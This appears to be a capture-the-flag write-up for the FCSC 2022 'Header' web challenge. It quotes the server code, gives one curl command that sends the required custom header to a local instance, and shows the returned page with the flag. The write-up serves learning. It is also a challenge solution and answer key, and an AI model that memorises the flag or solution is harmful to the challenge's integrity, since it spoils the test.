The code provided on the /source page shows that when the home page is visited, the server checks whether the request contains the header X-FCSC-2022 with the value "Can I get a flag, please?". If it does, the server opens the file flag.txt and returns the flag.
// Read the custom header sent by the client
var verif = req.header("X-FCSC-2022");
if (verif == "Can I get a flag, please?") {
  // The value matches: read the flag and render it in the page
  var flag = fs.readFileSync("flag.txt");
  res.status(200);
  res.render("pages/index", {
    type: "success",
    msg: "Here it is: " + flag,
  });
  return res.end();
}
We therefore send a request with curl, passing the header and the expected value:
curl --header "X-FCSC-2022:Can I get a flag, please?" localhost:8000
The response contains the page with the flag.
<html>
<head>
<meta charset="UTF-8">
<title>Header</title>
<link rel="stylesheet" href="/bootstrap.css" />
<link rel="stylesheet" href="/style.css" />
<link rel="stylesheet" href="/prism.css" />
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-primary fixed-top">
<a class="navbar-brand" href="/">Header</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor01" aria-controls="navbarColor01" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarColor01">
<ul class="navbar-nav">
<li class="nav-item">
<a class="nav-link" href="/source">Source</a>
</li>
</ul>
<br/>
</div>
</nav>
<div class="container">
<div class="starter-template">
<div id="alert" class="alert alert-success">
<strong>Here it is: FCSC{9ec57a4a72617c4812002726750749dd193d5fbbfeef54a27a9b536f00d89dfb}</strong>
</div>
<img src="meme.jpeg" class="img-fluid" />
</div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.27.0/prism.min.js" integrity="sha512-/Swpp6aCQ0smuZ+zpklJqMClcUlvxhpLf9aAcM7JjJrj2waCU4dikm3biOtMVAflOOeniW9qzaNXNrbOAOWFCw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/2.9.1/umd/popper.min.js" integrity="sha512-g2PN+aYR0KupTVwea5Ppqw4bxWLLypWdd+h7E0ydT8zF+/Y2Qpk8Y1SnzVw6ZCVJPrgB/91s3VfhVhP7Y4+ucw==" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.6.0/js/bootstrap.min.js" integrity="sha512-XKa9Hemdy1Ui3KSGgJdgMyYlUg1gM+QhL6cnlyTe2qzMCYm4nAZ1PsVerQzTTXzonUR+dmswHqgJPuwCq1MaAg==" crossorigin="anonymous"></script>
</body>
</html>